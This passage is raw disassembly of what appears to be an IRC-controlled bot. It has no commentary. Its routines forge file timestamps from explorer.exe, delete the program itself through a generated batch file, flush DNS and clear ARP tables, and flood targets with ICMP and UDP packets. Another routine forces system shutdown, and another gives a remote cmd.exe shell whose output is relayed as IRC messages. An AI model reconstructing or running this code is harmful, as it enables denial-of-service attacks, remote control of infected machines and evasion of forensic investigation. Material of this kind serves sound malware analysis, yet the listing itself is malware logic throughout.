pop ebp
retn
sub_40AAFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB7C proc near ; CODE XREF: sub_40E6A9+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call ds:off_43AE54
test eax, eax
jz short loc_40AC1B
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:off_424084
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; sub_4E02B0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40AC1B
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_42411C ;; GetFileTime
push ebx
mov ebx, ds:off_424078
call ebx ; sub_4E03D5
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; sub_4E02B0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40AC1B
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_424118 ;; SetFileTime
push esi
call ebx ; sub_4E03D5
loc_40AC1B: ; CODE XREF: sub_40AB7C+2A�j
; sub_40AB7C+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40AB7C endp
; =============== S U B R O U T I N E =======================================
sub_40AC20 proc near ; CODE XREF: sub_40EE72+13C4�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41511F
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_43ACE0 ;; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_40AC20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC42 proc near ; CODE XREF: sub_40CAF1+472�p
; sub_40EE72+59D4�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp ds:dword_42F5C0, esi
push edi
jz short loc_40AC66
cmp ds:dword_43AE68, esi
jnz short loc_40AC66
push esi
call sub_40C1AE
pop ecx
loc_40AC66: ; CODE XREF: sub_40AC42+13�j
; sub_40AC42+1B�j
call sub_416F25
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_42412C ;; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_4172B0
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:off_424084
mov edi, eax
cmp edi, esi
jbe loc_40ADC6
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_4172B0
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_42407C ;; WriteFile
push edi
call ds:off_424078
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_417330
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_436EDC
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:off_424100
push eax
call ds:off_424094
lea eax, [ebp+var_15C]
push eax
call ds:off_4240A8
cmp eax, 0FFFFFFFFh
jz short loc_40AD6E
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_424128 ;; SetFileAttributesA
loc_40AD6E: ; CODE XREF: sub_40AC42+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_4172B0
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_424124 ;; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_424120 ;; CreateProcessA
loc_40ADC6: ; CODE XREF: sub_40AC42+72�j
pop edi
pop esi
leave
retn
sub_40AC42 endp
; =============== S U B R O U T I N E =======================================
sub_40ADCA proc near ; CODE XREF: sub_4013EC+7�p
; sub_401992+7�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_43ADD8 ;; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40ADF2
push [esp+arg_0]
call ds:dword_43AE1C ;; gethostbyname
test eax, eax
jnz short loc_40ADEB
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ADEB: ; CODE XREF: sub_40ADCA+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40ADF2: ; CODE XREF: sub_40ADCA+D�j
retn
sub_40ADCA endp
; =============== S U B R O U T I N E =======================================
sub_40ADF3 proc near ; CODE XREF: sub_40EB92+D6�p
mov ecx, ds:dword_43ACC0
xor eax, eax
test ecx, ecx
jz short locret_40AE01
call ecx ; DnsFlushResolverCache
locret_40AE01: ; CODE XREF: sub_40ADF3+A�j
retn
sub_40ADF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE02 proc near ; CODE XREF: sub_40EE72:loc_414556�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call ds:dword_43AE14 ;; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AEC8
sub ecx, 32h
jz loc_40AEC1
sub ecx, 48h
jz short loc_40AE62
sub ecx, 6Eh
jz short loc_40AE5B
loc_40AE44: ; CODE XREF: sub_40AE02+8B�j
push eax
lea eax, [ebp+var_88]
push offset unk_42DA5C
push eax
call sub_4172B0
add esp, 0Ch
jmp short loc_40AEA2
; ---------------------------------------------------------------------------
loc_40AE5B: ; CODE XREF: sub_40AE02+40�j
push offset unk_42DA28
jmp short loc_40AE94
; ---------------------------------------------------------------------------
loc_40AE62: ; CODE XREF: sub_40AE02+3B�j
push [ebp+var_8]
call sub_417B89
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_417330
add esp, 10h
cmp esi, edi
jz short loc_40AE8F
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call ds:dword_43AE14 ;; GetIpNetTable
cmp eax, edi
jz short loc_40AEC8
jmp short loc_40AE44
; ---------------------------------------------------------------------------
loc_40AE8F: ; CODE XREF: sub_40AE02+79�j
push offset unk_42D9E8
loc_40AE94: ; CODE XREF: sub_40AE02+5E�j
; sub_40AE02+C4�j
lea eax, [ebp+var_88]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_40AEA2: ; CODE XREF: sub_40AE02+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_40BF6D
pop ecx
loc_40AEB2: ; CODE XREF: sub_40AE02+C8�j
; sub_40AE02+DC�j
push esi
call sub_417C3B
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AEC1: ; CODE XREF: sub_40AE02+32�j
push offset unk_42D9A8
jmp short loc_40AE94
; ---------------------------------------------------------------------------
loc_40AEC8: ; CODE XREF: sub_40AE02+29�j
; sub_40AE02+89�j
cmp [esi], edi
jbe short loc_40AEB2
lea ebx, [esi+4]
loc_40AECF: ; CODE XREF: sub_40AE02+DA�j
push ebx
call ds:dword_43AE10 ;; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AECF
jmp short loc_40AEB2
sub_40AE02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AEE0 proc near ; CODE XREF: sub_40144A+243�p
; sub_401D82+268�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_43AD3C ;; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_43B0CC
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_4172B0
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AEE0 endp
; =============== S U B R O U T I N E =======================================
sub_40AF39 proc near ; CODE XREF: sub_4010B5+24C�p
; sub_4010B5+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40AF62
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40AF55: ; CODE XREF: sub_40AF39+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40AF55
pop edi
jmp short loc_40AF66
; ---------------------------------------------------------------------------
loc_40AF62: ; CODE XREF: sub_40AF39+A�j
mov edx, [esp+4+arg_0]
loc_40AF66: ; CODE XREF: sub_40AF39+27�j
test esi, esi
pop esi
jz short loc_40AF70
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40AF70: ; CODE XREF: sub_40AF39+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AF39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF86 proc near ; DATA XREF: sub_40EE72+2E51�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call ds:dword_43AD24 ;; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call ds:dword_43ADD8 ;; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40AFE1
lea eax, [ebp+var_C0]
push eax
call ds:dword_43AE1C ;; gethostbyname
cmp eax, ebx
jz short loc_40AFE7
loc_40AFE1: ; CODE XREF: sub_40AF86+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_40B044
loc_40AFE7: ; CODE XREF: sub_40AF86+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42DAD8
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B027
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40D679
add esp, 14h
loc_40B027: ; CODE XREF: sub_40AF86+7F�j
lea eax, [ebp+var_344]
push eax
call sub_40BF6D
push [ebp+var_30]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
loc_40B044: ; CODE XREF: sub_40AF86+5F�j
cmp eax, ebx
jz short loc_40B054
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40B057
; ---------------------------------------------------------------------------
loc_40B054: ; CODE XREF: sub_40AF86+C0�j
mov [ebp+var_4], esi
loc_40B057: ; CODE XREF: sub_40AF86+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_417330
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_40B077
mov [ebp+var_3C], eax
loc_40B077: ; CODE XREF: sub_40AF86+EC�j
cmp [ebp+var_38], edi
jge short loc_40B07F
mov [ebp+var_38], edi
loc_40B07F: ; CODE XREF: sub_40AF86+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_40B0AC
loc_40B086: ; CODE XREF: sub_40AF86+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call ds:dword_43ACBC ;; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_40B086
loc_40B0AC: ; CODE XREF: sub_40AF86+FE�j
push [ebp+arg_0]
call ds:dword_43AE50 ;; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42DA9C
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B0F5
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40D679
add esp, 14h
loc_40B0F5: ; CODE XREF: sub_40AF86+14D�j
lea eax, [ebp+var_344]
push eax
call sub_40BF6D
push [ebp+var_30]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
sub_40AF86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B112 proc near ; DATA XREF: sub_40EE72+2FA9�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
pop ecx
push 11h
push 2
push 2
call ds:dword_43AE18 ;; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call ds:dword_43ADD8 ;; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40B1F7
lea eax, [ebp+var_B0]
push eax
call ds:dword_43AE1C ;; gethostbyname
cmp eax, edi
jnz short loc_40B1F0
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42DB4C
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B1D3
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40D679
add esp, 14h
loc_40B1D3: ; CODE XREF: sub_40B112+9F�j
lea eax, [ebp+var_334]
push eax
call sub_40BF6D
push [ebp+var_20]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_40B1F0: ; CODE XREF: sub_40B112+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_40B1FA
; ---------------------------------------------------------------------------
loc_40B1F7: ; CODE XREF: sub_40B112+6E�j
lea eax, [ebp+arg_0]
loc_40B1FA: ; CODE XREF: sub_40B112+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_40B215
call sub_41730C
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40B218
; ---------------------------------------------------------------------------
loc_40B215: ; CODE XREF: sub_40B112+F0�j
push [ebp+var_24]
loc_40B218: ; CODE XREF: sub_40B112+101�j
call ds:dword_43AD98 ;; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_40B22A
mov [ebp+var_24], esi
loc_40B22A: ; CODE XREF: sub_40B112+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_40B237
mov [ebp+var_24], eax
loc_40B237: ; CODE XREF: sub_40B112+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_40B24B
mov [ebp+var_28], esi
loc_40B24B: ; CODE XREF: sub_40B112+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_40B26C
loc_40B252: ; CODE XREF: sub_40B112+158�j
call sub_41730C
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_40B252
loc_40B26C: ; CODE XREF: sub_40B112+13E�j
; sub_40B112+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_40B2CB
push 0Bh
pop esi
loc_40B279: ; CODE XREF: sub_40B112+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_41730C
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call ds:dword_43ADFC ;; sendto
push [ebp+var_28]
call ds:dword_424064 ;; Sleep
dec esi
jnz short loc_40B279
cmp [ebp+var_24], edi
jnz short loc_40B26C
call sub_41730C
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call ds:dword_43AD98 ;; htons
mov [ebp+var_E], ax
jmp short loc_40B26C
; ---------------------------------------------------------------------------
loc_40B2CB: ; CODE XREF: sub_40B112+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42DB10
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B30B
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40D679
add esp, 14h
loc_40B30B: ; CODE XREF: sub_40B112+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_40BF6D
push [ebp+var_20]
call sub_417078
pop ecx
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
sub_40B112 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B328 proc near ; CODE XREF: sub_40B358+2A�p
; sub_40B390+7E�p ...
mov eax, ds:dword_43B0E4
push esi
mov esi, ds:off_424078
cmp eax, 0FFFFFFFFh
jz short loc_40B33C
push eax
call esi ; sub_4E03D5
loc_40B33C: ; CODE XREF: sub_40B328+F�j
mov eax, ds:dword_43B0EC
cmp eax, 0FFFFFFFFh
jz short loc_40B349
push eax
call esi ; sub_4E03D5
loc_40B349: ; CODE XREF: sub_40B328+1C�j
mov eax, ds:dword_43B0E0
cmp eax, 0FFFFFFFFh
jz short loc_40B356
push eax
call esi ; sub_4E03D5
loc_40B356: ; CODE XREF: sub_40B328+29�j
pop esi
retn
sub_40B328 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B358 proc near ; CODE XREF: sub_40C351+14A�p
; sub_40EE72+4881�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_417AB0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push ds:dword_43B0E8
call ds:dword_42407C ;; WriteFile
test eax, eax
jnz short loc_40B38B
call sub_40B328
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B38B: ; CODE XREF: sub_40B358+28�j
push 1
pop eax
leave
retn
sub_40B358 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B390 proc near ; CODE XREF: sub_40B417+D3�p
; sub_40B417+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_436EDC
push [ebp+arg_4]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40B3D3
push 7D0h
call ds:dword_424064 ;; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_4172B0
add esp, 10h
jmp short loc_40B3EA
; ---------------------------------------------------------------------------
loc_40B3D3: ; CODE XREF: sub_40B390+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_3 ; "%s"
push eax
call sub_4172B0
add esp, 0Ch
loc_40B3EA: ; CODE XREF: sub_40B390+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
test eax, eax
jg short loc_40B413
call sub_40B328
loc_40B413: ; CODE XREF: sub_40B390+7C�j
xor eax, eax
leave
retn
sub_40B390 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B417 proc near ; DATA XREF: sub_40B56C+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_43B0F0
loc_40B42F: ; CODE XREF: sub_40B417+79�j
; sub_40B417+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push ds:dword_43B0E4
call ds:dword_424134 ;; PeekNamedPipe
test eax, eax
jz loc_40B4FD
cmp [ebp+var_4], edi
jnz short loc_40B492
lea eax, [ebp+var_8]
push eax
push ds:dword_43B0E0
call ds:dword_424130 ;; GetExitCodeProcess
test eax, eax
jz short loc_40B488
cmp [ebp+var_8], 103h
jnz loc_40B521
loc_40B488: ; CODE XREF: sub_40B417+62�j
push 0Ah
call ds:dword_424064 ;; Sleep
jmp short loc_40B42F
; ---------------------------------------------------------------------------
loc_40B492: ; CODE XREF: sub_40B417+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40B4A9
loc_40B499: ; CODE XREF: sub_40B417+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_40B4F7
inc eax
cmp eax, [ebp+var_4]
jb short loc_40B499
loc_40B4A9: ; CODE XREF: sub_40B417+80�j
mov [ebp+var_4], esi
loc_40B4AC: ; CODE XREF: sub_40B417+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push ds:dword_43B0E4
call ds:off_424074
test eax, eax
jz short loc_40B549
lea eax, [ebp+var_20C]
push eax
push ebx
push ds:dword_43B124
call sub_40B390
add esp, 0Ch
jmp loc_40B42F
; ---------------------------------------------------------------------------
loc_40B4F7: ; CODE XREF: sub_40B417+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_40B4AC
; ---------------------------------------------------------------------------
loc_40B4FD: ; CODE XREF: sub_40B417+45�j
push offset dword_42DC0C
push ebx
push ds:dword_43B124
call sub_40B390
push [ebp+arg_0]
call sub_417078
add esp, 10h
push 1
call ds:dword_424054 ;; ExitThread
loc_40B521: ; CODE XREF: sub_40B417+6B�j
call sub_40B328
push offset dword_42DBD4
push ebx
push ds:dword_43B124
call sub_40B390
push [ebp+arg_0]
call sub_417078
add esp, 10h
push edi
call ds:dword_424054 ;; ExitThread
loc_40B549: ; CODE XREF: sub_40B417+C3�j
push offset dword_42DB94
push ebx
push ds:dword_43B124
call sub_40B390
push [ebp+arg_0]
call sub_417078
add esp, 10h
push edi
call ds:dword_424054 ;; ExitThread
sub_40B417 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B56C proc near ; CODE XREF: sub_40C351+99�p
; sub_40EE72+5774�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40B328
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call ds:off_43AE54
test eax, eax
jz loc_40B666
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, ds:dword_424140
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_40B666
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_40B666
mov edi, ds:dword_42413C
push 3
push esi
push esi
push offset dword_43B0E8
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_424138 ;; DuplicateHandle
test eax, eax
jz short loc_40B666
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_417330
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_436EDC
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_424120 ;; CreateProcessA
test eax, eax
jnz short loc_40B66E
loc_40B666: ; CODE XREF: sub_40B56C+2F�j
; sub_40B56C+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_40B71C
; ---------------------------------------------------------------------------
loc_40B66E: ; CODE XREF: sub_40B56C+F8�j
push [ebp+var_4]
mov edi, ds:off_424078
call edi ; sub_4E03D5
mov eax, [ebp+var_10]
push [ebp+var_28]
mov ds:dword_43B0E4, eax
mov eax, [ebp+var_8]
mov ds:dword_43B0EC, eax
mov eax, [ebp+var_2C]
mov ds:dword_43B0E0, eax
call edi ; sub_4E03D5
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov ds:dword_43B124, eax
jz short loc_40B6A8
push [ebp+arg_4]
jmp short loc_40B6A9
; ---------------------------------------------------------------------------
loc_40B6A8: ; CODE XREF: sub_40B56C+135�j
push ebx
loc_40B6A9: ; CODE XREF: sub_40B56C+13A�j
push offset dword_43B0F0
call sub_4172B0
pop ecx
pop ecx
push esi
push 7
push offset dword_42DC90
call sub_416D5C
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov ds:dword_4407F8[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40B417
push esi
push esi
call ds:dword_4240A0 ;; CreateThread
cmp eax, esi
mov ds:dword_440804[edi], eax
jnz short loc_40B71A
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset dword_42DC4C
push eax
call sub_4172B0
lea eax, [ebp+var_378]
push eax
call sub_40BF6D
add esp, 10h
loc_40B71A: ; CODE XREF: sub_40B56C+185�j
xor eax, eax
loc_40B71C: ; CODE XREF: sub_40B56C+FD�j
pop edi
pop esi
pop ebx
leave
retn
